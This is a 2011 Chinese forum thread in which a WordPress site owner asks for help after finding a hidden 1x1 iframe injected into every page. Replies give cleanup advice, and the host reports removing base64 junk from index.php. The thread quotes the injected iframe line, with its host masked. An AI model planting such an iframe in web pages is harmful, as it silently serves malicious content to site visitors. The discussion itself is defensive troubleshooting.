过期域名预定抢注

 找回密碼
 免费注册

[急!急!急!]網站被人加入可疑代碼,如何清除?

[複製鏈接]
發表於 2011-6-2 22:01:07 | 顯示全部樓層 |閱讀模式
本帖最後由 assban 於 2011-6-2 22:05 編輯
  O) `$ O% B; E- X. m$ L+ n/ N3 J8 z1 Q, k, t; n8 _8 {
網站被人加入可疑代碼
; h- {# ~  i% N8 j1 [. P! @代碼是:
  1. <iframe src="http://xxxxxxxx.xx.cc/go/1" width="1" height="1"></iframe>
複製代碼
網站是Wordpress搭建的,查找模版的源代碼,在源代碼裡面並沒有發現可疑的代碼。6 N# H& _' [( r/ l
而且更換另一個模版,依然出現可疑代碼。3 ?0 w% |* s8 U
( J7 w& O5 c$ Y2 K0 i" U
該不會是空間提供商搞鬼吧?用的是國外付費空間,同一個空間下,另外的域名正常。
$ \* p2 I& _; u  @" {& O誰有這方面的處理經驗?希望多多指教!
+ E8 U) C" _) O8 K) {3 r- T! z( ~2 r- a
謝謝!
發表於 2011-6-2 22:04:35 | 顯示全部樓層
被人掛馬了. M( n1 t( P9 `" V1 K5 c* l
空間商一般不會搞這個事情 沒意思的
" w+ s( j! k+ a" {! b代碼不一定加在模版裡
( w; V# d( K* Z) ^0 f- j你先查看所有文件的修改時間 找出最近被修改的可疑文件/ N' z3 q7 A3 q" ^" Q9 n
一般情況下WORDPRESS被入侵可能性比較小 安全做得不錯的! p  M( V3 Q1 Z  S
如果實在不行 導出WORDPRESS的數據 然後將WORDPRESS重新安裝
回復 给力 爆菊

使用道具 舉報

 樓主| 發表於 2011-6-2 22:30:18 | 顯示全部樓層
空間商反應很快,求助信發出去一個小時左右就解決了0 |. m# Y  d8 U8 C1 r( ~
這是回信
4 c& }% H& Q5 h. NYour site files are almost all owned by apache which makes your site potentially exploitable.  The base64 encoded junk was inserted into your index.php file.  I've removed it.  The IFRAME no longer appears in your site.
回復 给力 爆菊

使用道具 舉報

發表於 2011-6-2 23:13:51 | 顯示全部樓層
哎呀,悲劇了
回復 给力 爆菊

使用道具 舉報

發表於 2011-6-3 00:07:43 | 顯示全部樓層
如果我沒記記錯的話 這種 應該不是在網站上 可能在數據庫內
回復 给力 爆菊

使用道具 舉報

發表於 2011-6-3 00:54:35 | 顯示全部樓層
Your site files are almost all owned by apache which makes your site potentially exploitable& X3 `) J3 w/ j: E

4 [8 A1 {/ ]6 p# _, f這話有意思啊。。。。# @/ x' Z" q7 U# T$ W- f6 J
3 h" d$ E0 e  O' ]& @
順便問下,LZ是什麼版本的WP?
回復 给力 爆菊

使用道具 舉報

發表於 2011-6-3 01:13:29 | 顯示全部樓層
升級一下wp的版本吧
回復 给力 爆菊

使用道具 舉報

 樓主| 發表於 2011-6-3 07:46:38 | 顯示全部樓層
本帖最後由 assban 於 2011-6-3 07:48 編輯
( b+ ~# E, K3 E0 m3 c  y% L" B
* B% F: E' _) }4 v1 |; X1 S 回復7# cissss & H: x0 V5 m* M: |
我用的空間,不是CPanel管理,沒有一鍵安裝WordPress* N5 H( z6 Q# G
我裝WP的時候,用人家推薦的一個PHP文件,上傳到自己空間後,運行那個PHP文件,那個PHP文件就能從WordPress.org自動下載並安裝WP
: k. e6 f( |- o  L
1 C1 Q' i; u0 y8 p" }) k用這種辦法裝WP,省卻下載WP安裝包到自己電腦上然後再上傳的時間.# l4 L* L% s0 ~  B6 z: x
0 i0 [0 H* U( H9 B, K
可是用那個PHP文件安裝的WP,文件的所有者都顯示為apache,
% O0 t3 V/ I4 `) \( E2 V而我從自己電腦上傳的文件,文件所有者顯示為我的用戶ID (ClientIDxxx)! R$ G. z. U) @: l8 ]) R: `
+ y' g9 I- |& j& I# z
空間商的意思,文件所有者為apache更容易遭到攻擊.
回復 给力 爆菊

使用道具 舉報

發表於 2011-6-3 08:34:06 | 顯示全部樓層
你不覺得你那個php本身就有問題
回復 给力 爆菊

使用道具 舉報

發表於 2011-6-3 10:50:10 | 顯示全部樓層
應該是一開始就被人家掛馬了。
回復 给力 爆菊

使用道具 舉報

您需要登錄後才可以回帖 登錄 | 免费注册

本版積分規則

4um點基跨境網編創業社區

GMT+8, 2024-11-24 02:52

By DZ X3.5

小黑屋

快速回復 返回頂部 返回列表